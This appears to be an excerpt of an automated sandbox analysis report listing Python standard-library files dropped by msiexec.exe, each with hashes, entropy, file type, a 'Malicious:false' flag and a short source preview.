                                                                                                                                SHA-256:5C46C1CCCC32E7778E3AE4F7018D4D713AAA1DBD13210506472C2E6DEE2D4F73
                                                                                                                                SHA-512:9BFBF93216DAA4628F3D9D248536B26953F029108D928719C1DB5882EDED5BAC5B715FD5E10FBFD43E0EE948CC1730C0917186F23FD8E5ECBC82C8A7755C1360
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A powerful, extensible, and easy-to-use option parser.....By Greg Ward <gward@python.net>....Originally distributed as Optik.....For support, use the optik-users@lists.sourceforge.net mailing list..(http://lists.sourceforge.net/lists/listinfo/optik-users).....Simple usage example:.... from optparse import OptionParser.... parser = OptionParser().. parser.add_option("-f", "--file", dest="filename",.. help="write report to FILE", metavar="FILE").. parser.add_option("-q", "--quiet",.. action="store_false", dest="verbose", default=True,.. help="don't print status messages to stdout").... (options, args) = parser.parse_args().."""....__version__ = "1.5.3"....__all__ = ['Option',.. 'make_option',.. 'SUPPRESS_HELP',.. 'SUPPRESS_USAGE',.. 'Values',.. 'OptionContainer',.. 'OptionGroup',.. 'OptionParser',.. 'HelpFormatter',.. 'Indented
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40584
                                                                                                                                Entropy (8bit):4.576432068236521
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:FTfWsLgH74t1vLYVPkbSP5pn4pIiwCepM82y76EM6ED6En6En63686A6xct1iM/:FTWcUT3aIiwlT
                                                                                                                                MD5:F3100823A77E959748945A93DAA1C1A8
                                                                                                                                SHA1:BACD0FDC6DB1884C02FD5F87BD08120C204CC555
                                                                                                                                SHA-256:E6BC63BCE35ECBAE485B95CB88B4DD66DB0485E31215D247DD6D11D3FFCFEED5
                                                                                                                                SHA-512:7E3A881710B382F9A82E5CBE65BE70ED1E98C2001838954403175AFB90CDA94DC56E14370B6141CCC95283376995BABED74F169D8A18672E21F132C02C103AD0
                                                                                                                                Malicious:false
                                                                                                                                Preview:r"""OS routines for NT or Posix depending on what system we're on.....This exports:.. - all functions from posix or nt, e.g. unlink, stat, etc... - os.path is either posixpath or ntpath.. - os.name is either 'posix' or 'nt'.. - os.curdir is a string representing the current directory (always '.').. - os.pardir is a string representing the parent directory (always '..').. - os.sep is the (or a most common) pathname separator ('/' or '\\').. - os.extsep is the extension separator (always '.').. - os.altsep is the alternate pathname separator (None or '/').. - os.pathsep is the component separator used in $PATH etc.. - os.linesep is the line separator in text files ('\r' or '\n' or '\r\n').. - os.defpath is the default search path for executables.. - os.devnull is the file path of the null device ('/dev/null', etc.)....Programs that import and use 'os' stand a better chance of being..portable between different platforms. Of course, they must then..only use functions that are
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):49978
                                                                                                                                Entropy (8bit):4.447908129594887
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:lutewaM+l9h8ikID7Qaq2mM1E0BNs1GP3qHxmRPRx:lutew4F3D7Qane0BNs1GP3qH+Rx
                                                                                                                                MD5:87DC2EBA08103244A3767FF5B69D97A9
                                                                                                                                SHA1:86B5CDEC986269A43A5F936D26728ED29F059685
                                                                                                                                SHA-256:C7543376B6CBAB9886689D710994DCDE66733F5D3A4B5711C90DC12C6C2C5801
                                                                                                                                SHA-512:C15C2E5B61AF49CE5D500FCBC022727970ADA386DE36D915A7510CB8D18C2DD4D3537CE89A61535ABBC7900677C2F1F47727AD75A178D6C3900B650948B63275
                                                                                                                                Malicious:false
                                                                                                                                Preview:import fnmatch..import functools..import io..import ntpath..import os..import posixpath..import re..import sys..import warnings..from _collections_abc import Sequence..from errno import ENOENT, ENOTDIR, EBADF, ELOOP..from operator import attrgetter..from stat import S_ISDIR, S_ISLNK, S_ISREG, S_ISSOCK, S_ISBLK, S_ISCHR, S_ISFIFO..from urllib.parse import quote_from_bytes as urlquote_from_bytes......__all__ = [.. "PurePath", "PurePosixPath", "PureWindowsPath",.. "Path", "PosixPath", "WindowsPath",.. ]....#..# Internals..#...._WINERROR_NOT_READY = 21 # drive exists but is not accessible.._WINERROR_INVALID_NAME = 123 # fix for bpo-35306.._WINERROR_CANT_RESOLVE_FILENAME = 1921 # broken symlink pointing to itself....# EBADF - guard against macOS `stat` throwing EBADF.._IGNORED_ERRNOS = (ENOENT, ENOTDIR, EBADF, ELOOP)...._IGNORED_WINERRORS = (.. _WINERROR_NOT_READY,.. _WINERROR_INVALID_NAME,.. _WINERROR_CANT_RESOLVE_FILENAME)....def _ignore_error(exception):.. return
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65390
                                                                                                                                Entropy (8bit):4.343702262902166
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:X/919CiEvNyYaNGNxJe5gMhjpGergxF2F6e1QliUcWQ36ApxGqfgZGTG33pCqzzg:XV19CI9GergxYR+xdzzg
                                                                                                                                MD5:E3C9BC65E85AE1A7A477CF21A657E121
                                                                                                                                SHA1:670C81C12DD0A494333203B59C97F083DC6CE813
                                                                                                                                SHA-256:C59A2DE935FA475350595639822BC83C296E9EF7F3AEF98D4714878CEF67CB6F
                                                                                                                                SHA-512:18EF2F14B45367A568FB8785FBB6A160B29764963F07E2C79A27A2DB54E3987DB524AD281569E6E5A152EA7467405FBE719E0C4D835DA014172E08096D46DB15
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3...."""..The Python Debugger Pdb..=======================....To use the debugger in its simplest form:.... >>> import pdb.. >>> pdb.run('<a statement>')....The debugger's prompt is '(Pdb) '. This will stop in the first..function call in <a statement>.....Alternatively, if a statement terminated with an unhandled exception,..you can use pdb's post-mortem facility to inspect the contents of the..traceback:.... >>> <a statement>.. <exception traceback>.. >>> import pdb.. >>> pdb.pm()....The commands recognized by the debugger are listed in the next..section. Most can be abbreviated as indicated; e.g., h(elp) means..that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',..nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in..square brackets. Alternatives in the command syntax are separated..by a vertical bar (|).....A blank line repeats the previous command literally, except for..'list', where
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):66769
                                                                                                                                Entropy (8bit):4.582827313661204
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:f/It2JPYZKT0egjRsk4jOEFvVNVdA2Kn5YIqEIKyNxzXhln:f/lVT0eg1P4jBvVNfA26SBN1H
                                                                                                                                MD5:91424AE0A9D1B1AB8074044C19813A21
                                                                                                                                SHA1:1EE0E43AE3F897734095B2A80D2055A96F84C4EB
                                                                                                                                SHA-256:6799D6E62B61392A6625297FB02CDE322A64713F4050F9171835D20647F430F9
                                                                                                                                SHA-512:A76533B62B42816B980E5BAA87F46AF3EF8E944BAC0B6FC5697F35F241FD1F749BBD0801A392F94F4331FF1ED89583313903FBF558535E70CB865921B2BB2505
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Create portable serialized representations of Python objects.....See module copyreg for a mechanism for registering custom picklers...See module pickletools source for extensive comments.....Classes:.... Pickler.. Unpickler....Functions:.... dump(object, file).. dumps(object) -> string.. load(file) -> object.. loads(bytes) -> object....Misc variables:.... __version__.. format_version.. compatible_formats...."""....from types import FunctionType..from copyreg import dispatch_table..from copyreg import _extension_registry, _inverted_registry, _extension_cache..from itertools import islice..from functools import partial..import sys..from sys import maxsize..from struct import pack, unpack..import re..import io..import codecs..import _compat_pickle....__all__ = ["PickleError", "PicklingError", "UnpicklingError", "Pickler",.. "Unpickler", "dump", "dumps", "load", "loads"]....try:.. from _pickle import PickleBuffer.. __all__.append("PickleBuffer"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):96376
                                                                                                                                Entropy (8bit):4.70927586282489
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:2eNm/Sv/H0mLaWZ5PZFACL/Vx3yRF6lceF0nL13:2eNmyceE3
                                                                                                                                MD5:BF481644934BC14B72C7A9CFAF9C0A2E
                                                                                                                                SHA1:A411AE3DD3AE3DF53B214DB31FC13AB7233554EC
                                                                                                                                SHA-256:D9BB042BC26DAD7A99D1A1ADB3ACEE7C3E93D8B6F5068B55D9B55B6FF3CCD620
                                                                                                                                SHA-512:C4C77D5396FA79D671607F8BEFE5ED15C1FCEC1BC306653380608E611383C38E96FEBD07C176308D40A553FDE86EBC1150CD7E2D2586D0067BF28E1343A45718
                                                                                                                                Malicious:false
                                                                                                                                Preview:'''"Executable documentation" for the pickle module.....Extensive comments about the pickle protocols and pickle-machine opcodes..can be found here. Some functions meant for external use:....genops(pickle).. Generate all the opcodes in a pickle, as (opcode, arg, position) triples.....dis(pickle, out=None, memo=None, indentlevel=4).. Print a symbolic disassembly of a pickle...'''....import codecs..import io..import pickle..import re..import sys....__all__ = ['dis', 'genops', 'optimize']....bytes_types = pickle.bytes_types....# Other ideas:..#..# - A pickle verifier: read a pickle and check it exhaustively for..# well-formedness. dis() does a lot of this already...#..# - A protocol identifier: examine a pickle and return its protocol number..# (== the highest .proto attr value among all the opcodes in the pickle)...# dis() already prints this info at the end...#..# - A pickle optimizer: for example, tuple-building code is sometimes more..# elaborate than necessary, cater
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9228
                                                                                                                                Entropy (8bit):4.62510383248816
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:dNkrAzSFOVVuP49BSMIt57PMd3hXQ0m6VmGJbIDhP7W8O6xVSjfvEoebDAMnV/mR:dNkrAzSYVVuE+Ybm0RIP5rhat8Mv
                                                                                                                                MD5:0938E9DC69FE21BE4EE02F47027D737F
                                                                                                                                SHA1:38CCA40198702F62A2AB252933ED96A787F65154
                                                                                                                                SHA-256:969745CB4B9B9EAAA03C9EA56E36D7FECC2C926FD01E17E9F19814742E896AC4
                                                                                                                                SHA-512:158156667032F1533451B9F54E58BB228063DEB0BE7C45BEADD335561E403194C3B1CED80CEAB9292C6BE58002B1553644A6DF28C29F238BC53DE907899D27BF
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Conversion pipeline templates.....The problem:..------------....Suppose you have some data that you want to convert to another format,..such as from GIF image format to PPM image format. Maybe the..conversion involves several steps (e.g. piping it through compress or..uuencode). Some of the conversion steps may require that their input..is a disk file, others may be able to read standard input; similar for..their output. The input to the entire conversion may also be read..from a disk file or from an open file, and similar for its output.....The module lets you construct a pipeline template by sticking one or..more conversion steps together. It will take care of creating and..removing temporary files if they are necessary to hold intermediate..data. You can then use the template to do conversions from many..different sources to many different destinations. The temporary..file names used are different each time the template is used.....The templates are objects so you can creat
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25331
                                                                                                                                Entropy (8bit):4.429512303705571
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ubpsSPckq/vGkbcgDeywNuTvzy2aGqMuUtC+hjx0UtkGG1FIzN1MVhOsV:ubaSP8smegBNjWz1Fht
                                                                                                                                MD5:E7CA8A11E8E309BC6E4A9AB4366E36BC
                                                                                                                                SHA1:7F0BB18643D9C0F6ECA6A0DFC0EA655260F348FC
                                                                                                                                SHA-256:DF65481BE198E3F5C15BD64B827F82A50BADCEADBEE169A0E01B765A927A8A23
                                                                                                                                SHA-512:7F71BF3ADCFD2DDEEB44E43FAA2E77BC4923E20EA2FC05A326F87935998895958318CE4A81482C899F56775C4E849D31052E8808584C6E466E1BB679CDD27375
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Utilities to support packages."""....from collections import namedtuple..from functools import singledispatch as simplegeneric..import importlib..import importlib.util..import importlib.machinery..import os..import os.path..import sys..from types import ModuleType..import warnings....__all__ = [.. 'get_importer', 'iter_importers', 'get_loader', 'find_loader',.. 'walk_packages', 'iter_modules', 'get_data',.. 'ImpImporter', 'ImpLoader', 'read_code', 'extend_path',.. 'ModuleInfo',..]......ModuleInfo = namedtuple('ModuleInfo', 'module_finder name ispkg')..ModuleInfo.__doc__ = 'A namedtuple with minimal info about a module.'......def _get_spec(finder, name):.. """Return the finder-specific module spec.""".. # Works with legacy finders... try:.. find_spec = finder.find_spec.. except AttributeError:.. loader = finder.find_module(name).. if loader is None:.. return None.. return importlib.util.spec_from_loader(name, loader)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):43411
                                                                                                                                Entropy (8bit):4.683399349701994
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:Cbc2S92P0OLDwlVNZib4xEsA7Gkep+YafLlc6eG3Tu8HDSCsFwldmPNJOw+2/ln6:Z2BLDwub43zp+VfLlciS8HDSCsFwTSx6
                                                                                                                                MD5:4E52A4B2FF9639CFF96B6774C72FD758
                                                                                                                                SHA1:F4C885F03893CCE40E9718E571502E39A84CC7CA
                                                                                                                                SHA-256:1851632BDD585D7FFE9D10D2237EA51E9EF6A769D25476DE2DD1AD5D2C6A76E4
                                                                                                                                SHA-512:700658046A1F576B1F763D9F7FD55698440D518EC8A874D150DB75630E56D18F2CD36A5EF8CF1514EBB13EB0937619ADBEE263F10FB993D78072FAA2AADC7FB0
                                                                                                                                Malicious:false
                                                                                                                                Preview:#!/usr/bin/env python3....""" This module tries to retrieve as much platform-identifying data as.. possible. It makes this information available via function APIs..... If called from the command line, it prints the platform.. information concatenated as single string to stdout. The output.. format is usable as part of a filename....."""..# This module is maintained by Marc-Andre Lemburg <mal@egenix.com>...# If you find problems, please submit bug reports/patches via the..# Python bug tracker (http://bugs.python.org) and assign them to "lemburg"...#..# Still needed:..# * support for MS-DOS (PythonDX ?)..# * support for Amiga and other still unsupported platforms running Python..# * support for additional Linux distributions..#..# Many thanks to all those who helped adding platform-specific..# checks (in no particular order):..#..# Charles G Waldman, David Arnold, Gordon McMillan, Ben Darnell,..# Jeff Bauer, Cliff Crawford, Ivan Van Laning
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):29152
                                                                                                                                Entropy (8bit):4.615522813124102
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:K4GdSsaOu3ywwNAltyQVGdYjzAX1i5vi2R2dLpv68LuSYGXlzBp1yD:bGdSsk3ywz//jzAX1i5vi2R27v68LuSi
                                                                                                                                MD5:9B75B2EE8D68DBC0A54585050B4304A7
                                                                                                                                SHA1:2802229AEE21EDC9C630FDDD0ADA3CE6166E87B8
                                                                                                                                SHA-256:22601A98DC3D3D66FA303ECA47B8E6538B22FD6A157411EACAEFC3E78020EC6E
                                                                                                                                SHA-512:7101A5D5E50D6041151EE75BD665CB8F3B83527D6A47B665D93F055AE70DD374D83532748D3430FC27F2359788292D545C61E4D16913B1268E96A03D671E0832
                                                                                                                                Malicious:false
                                                                                                                                Preview:r"""plistlib.py -- a tool to generate and parse MacOSX .plist files.....The property list (.plist) file format is a simple XML pickle supporting..basic object types, like dictionaries, lists, numbers and strings...Usually the top level object is a dictionary.....To write out a plist file, use the dump(value, file)..function. 'value' is the top level object, 'file' is..a (writable) file object.....To parse a plist from a file, use the load(file) function,..with a (readable) file object as the only argument. It..returns the top level object (again, usually a dictionary).....To work with plist data in bytes objects, you can use loads()..and dumps().....Values can be strings, integers, floats, booleans, tuples, lists,..dictionaries (but only with string keys), Data, bytes, bytearray, or..datetime.datetime objects.....Generate Plist example:.... pl = dict(.. aString = "Doodah",.. aList = ["A", "B", 12, 32.1, [1, 2, 3]],.. aFloat = 0.1,.. anInt = 728,..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15681
                                                                                                                                Entropy (8bit):4.545608549924057
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:399df9uylT1ZUhRFeOS0DVipTnzr4ZCi2w:N9dUylTma0DVipDzUZCi2w
                                                                                                                                MD5:8827240702694AD5C2A064103157245C
                                                                                                                                SHA1:8596D00B1574A06C705A00503DCE496F1E905953
                                                                                                                                SHA-256:FCA47328C848D2517B797C303910F363CD118D4A57EAFC699EA9BD07E3555DA9
                                                                                                                                SHA-512:3A9C6E5911C26A9960F1676E449FC267AF9CFD5746B092804CFE43A11B1F68AD624B5AB72A559E759B2F10869D111DB8E58E567E43D0B5CA6B361826DFA475F9
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""A POP3 client class.....Based on the J. Myers POP3 draft, Jan. 96.."""....# Author: David Ascher <david_ascher@brown.edu>..# [heavily stealing from nntplib.py]..# Updated: Piers Lauder <piers@cs.su.oz.au> [Jul '97]..# String method conversion and test jig improvements by ESR, February 2001...# Added the POP3_SSL class. Methods loosely based on IMAP_SSL. Hector Urtubia <urtubia@mrbook.org> Aug 2003....# Example (see the test function at the end of this file)....# Imports....import errno..import re..import socket..import sys....try:.. import ssl.. HAVE_SSL = True..except ImportError:.. HAVE_SSL = False....__all__ = ["POP3","error_proto"]....# Exception raised when an error or invalid response is received:....class error_proto(Exception): pass....# Standard Port..POP3_PORT = 110....# POP SSL PORT..POP3_SSL_PORT = 995....# Line terminators (we always output CRLF, but accept any of CRLF, LFCR, LF)..CR = b'\r'..LF = b'\n'..CRLF = CR+LF....# maximal line length when callin
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17547
                                                                                                                                Entropy (8bit):4.492594685188725
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:o1EBBFYOHedlLGN2lH/DHQzfaFKqXJvjLRz96du7ZLtHcpYtD:o1EBBSLkaFKqqu7ZLGp0
                                                                                                                                MD5:A22F9D95CD41A0805C0205E3AAD54788
                                                                                                                                SHA1:6E66E8FBEF2C2683297F3859309737C49CB5FC02
                                                                                                                                SHA-256:EA2B1A3C0F847904C2ED0DE40742AB854AC576716B7DBADC7C0EEBA50A6C4977
                                                                                                                                SHA-512:AF86F1790D63A54687C073781793266CE4AD8FFB26B7FE0BB21ACA71DE17F0203BB1618AA74C1CC387D94C03A85050C6C93ED3AF43464BC880CCA7BB02EFAA7F
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Common operations on Posix pathnames.....Instead of importing this module directly, import os and refer to..this module as os.path. The "os.path" name is an alias for this..module on Posix systems; on other systems (e.g. Windows),..os.path provides the same operations in a manner specific to that..platform, and is an alias to another module (e.g. ntpath).....Some of this can actually be useful on non-Posix systems too, e.g...for manipulation of the pathname component of URLs..."""....# Strings representing various path-related bits and pieces...# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '/'..pathsep = ':'..defpath = '/bin:/usr/bin'..altsep = None..devnull = '/dev/null'....import os..import sys..import stat..import genericpath..from genericpath import *....__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25160
                                                                                                                                Entropy (8bit):4.3211245031418875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:0zJwB8YxVSFKCbMxmDO9dcqaDmQnfxRW9VguPxWLgB:0zJwKY7Cb3DgiTWVxW4
                                                                                                                                MD5:BC7CCB027B92A4BAEFEBF58990C1C543
                                                                                                                                SHA1:BF48ADC2668F8CA0F6D34E0516C13F06EAC1D4CF
                                                                                                                                SHA-256:8959B7976AC79091E7553C81F88DBC66AA64FFDBAF44A9B06546B4B1E0450090
                                                                                                                                SHA-512:A4A85BBBC87EB7DD2F76B607575BAAF77B6802FCA2B3EDC31C4912A42F1963CC898062D57974AA7F75315BC472602C47E0B8C8F5F76DC08348E392DC304A9A9D
                                                                                                                                Malicious:false
                                                                                                                                Preview:# Author: Fred L. Drake, Jr...# fdrake@acm.org..#..# This is a simple little module I wrote to make life easier. I didn't..# see anything quite like it in the library, though I may have overlooked..# something. I wrote this when I was trying to read some heavily nested..# tuples with fairly non-descriptive content. This is modeled very much..# after Lisp/Scheme - style pretty-printing of lists. If you find it..# useful, thank small children who sleep at night....."""Support to pretty-print lists, tuples, & dictionaries recursively.....Very simple, but useful, especially in debugging data structures.....Classes..-------....PrettyPrinter().. Handle pretty-printing operations onto a stream using a configured.. set of formatting parameters.....Functions..---------....pformat().. Format a Python object into a pretty-printed representation.....pprint().. Pretty-print a Python object to a stream [default is sys.stdout].....saferepr().. Generate a '
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23481
                                                                                                                                Entropy (8bit):4.4456903061634785
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:eQG31DiWobPzKZNVKtSG/6stsZhCs7SJ4ATp9FJ8sxCCxZhlklCB7xz7N2:ej1DizbGZNZG/ics7YTp9FJ8sxCCRel3
                                                                                                                                MD5:5B9AA68D3E57EAEA89D8183F2A0C543D
                                                                                                                                SHA1:84422184D267F877C5266E5A62901F60828AEB4E
                                                                                                                                SHA-256:3307B50C8E87ED3508340B455C371BFA6B148898D66FF8F0AD3D47EBF27E869E
                                                                                                                                SHA-512:9187A6A20064E29BDE5292BDC5BCD20B62DF7EAE949D8CD4A8B79E2E169D9FA5559C89187CFE6B308FB990F30BF1B06BA01B3D75F71A152DBC79E414E73B4297
                                                                                                                                Malicious:false
                                                                                                                                Preview:#! /usr/bin/env python3..#..# Class for profiling python code. rev 1.0 6/2/94..#..# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum...."""Class for profiling Python code."""....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import time..import marshal....__all__ = ["run", "runctx"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):30136
                                                                                                                                Entropy (8bit):4.338574548684236
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oQG3oDZo9/URDhs71UDrLgxAELHsvKSGdRo0t1F9dKPSJ0HXA6Erqr9roMBXLvZ7:ojoy90hsLxAkdlKPSOC0h
                                                                                                                                MD5:654ECE37C49EA0AF582AADB7E42F46E4
                                                                                                                                SHA1:4BA0EE86179B77CE32834AD1D8C8203DAB0C82D1
                                                                                                                                SHA-256:09901439A74D9728AF79B6C7ACF6E5AF80E090D3FE4E0EFB51AD802BCC1442EC
                                                                                                                                SHA-512:6DEC2F3CE100FB21CC8E1B4ED5FDC6A44082938596BF016A4C891114F65156DDD87B21F8955D151FC792F6D6363433B32D594132D39658FC1FEBBFC2941606AE
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Class for printing reports on profiled python code."""....# Written by James Roskind..# Based on prior profile module by Sjoerd Mullender.....# which was hacked somewhat by: Guido van Rossum....# Copyright Disney Enterprises, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,..# either express or implied. See the License for the specific language..# governing permissions and limitations under the License.......import sys..import os..import time..import marshal..import re....from enum import StrEnum, _simple_enum..from functools import cmp_to
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5400
                                                                                                                                Entropy (8bit):4.632984387456067
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:eE/i140+nvF19uaLUHzQRXwiX/H80Ni6BONKI1km8jKTlTZw+PTX+v5/fYvOn:eGV0+vZTLwQRXPPHriHhEu9Zw+PbM5/J
                                                                                                                                MD5:76D45ABE784519B8C8552EF253C46F85
                                                                                                                                SHA1:871A4ECAE472F27509ED8008F0438E942908C3DC
                                                                                                                                SHA-256:32F429813D305FA49201E761F11AFAA9D9AED79016F4980C2F01CC90AB8BA48B
                                                                                                                                SHA-512:DC594987EB61BFA87564637C661B361679A84B8042C6B54F2BFE04D9EDFF5F138E509D93D4C517FAD2192D154BFEB9210B1B61704F4F2B582CEA35FC279C4A35
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Pseudo terminal utilities."""....# Bugs: No signal handling. Doesn't set slave termios and window size...# Only tested on Linux, FreeBSD, and macOS...# See: W. Richard Stevens. 1992. Advanced Programming in the..# UNIX Environment. Chapter 19...# Author: Steen Lumholt -- with additions by Guido.....from select import select..import os..import sys..import tty....# names imported directly for test mocking purposes..from os import close, waitpid..from tty import setraw, tcgetattr, tcsetattr....__all__ = ["openpty", "fork", "spawn"]....STDIN_FILENO = 0..STDOUT_FILENO = 1..STDERR_FILENO = 2....CHILD = 0....def openpty():.. """openpty() -> (master_fd, slave_fd).. Open a pty master/slave pair, using os.openpty() if possible.""".... try:.. return os.openpty().. except (AttributeError, OSError):.. pass.. master_fd, slave_name = _open_terminal().. slave_fd = slave_open(slave_name).. return master_fd, slave_fd....def master_open():.. """mas
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8049
                                                                                                                                Entropy (8bit):4.51326914454816
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:mhnIB1tuDZ6ryJ0Dl8kr+5MboQE/Hcw1Zatu4dkKk6Dg7D3USWJ3DirI2dVDHsky:mnI5uB580/Z8UIg8Sm+rI2PDHsky
                                                                                                                                MD5:686E650CC5186DF740BB778A11376241
                                                                                                                                SHA1:32D7D66CAFDE71C7F16A33E52AB7CE093912B04F
                                                                                                                                SHA-256:BA4E5D1AC94FEC03BB7EDE8E1B7E4D56C8F165D9B3CDD130E16902D13489FCC4
                                                                                                                                SHA-512:F8E444ADB2359CFD7BA3B14B9388AF4023FB71AEF211FAB82373C0FDD24E9F2ABB065489A7F2AE693852AC189F3B3163620200FC968F071092596900ABB901F4
                                                                                                                                Malicious:false
                                                                                                                                Preview:"""Routine to "compile" a .py file to a .pyc file.....This module has intimate knowledge of the format of .pyc files..."""....import enum..import importlib._bootstrap_external..import importlib.machinery..import importlib.util..import os..import os.path..import sys..import traceback....__all__ = ["compile", "main", "PyCompileError", "PycInvalidationMode"]......class PyCompileError(Exception):.. """Exception raised when an error occurs while attempting to.. compile the file..... To raise this exception, use.... raise PyCompileError(exc_type,exc_value,file[,msg]).... where.... exc_type: exception type to be used in error message.. type name can be accesses as class variable.. 'exc_type_name'.... exc_value: exception value to be used in error message.. can be accesses as class variable 'exc_value'.... file: name of file being compiled to be used in error message.. c
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11710
                                                                                                                                Entropy (8bit):4.504337884600187
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:BzHcJfRYL1hkj7CXEpriGyN1R73rM9R5BWq/3wSg9bberhTtsahL:Bz8JRYLXE3ab77MD5wq/34buhxsaR
                                                                                                                                MD5:67EDE4D94842456FA89ABA6B55AA448C
                                                                                                                                SHA1:ED3E010535D4418EE95C61F65674F5B3FEBDDFE1
                                                                                                                                SHA-256:E87683A58D47E7E7C49BD1BB83BEC01BC8EDF803DEFF289AC30C2C5FCC8DA979
                                                                                                                                SHA-512:7D500CC706E1D2936B22894979881AE3A7BC40949A085780F684C64441227ECCFBC6DB5B6711CF82E169169761B291AB0458E46E7835C8D41947B2CA002853B4
                                                                                                                                Malicious:false
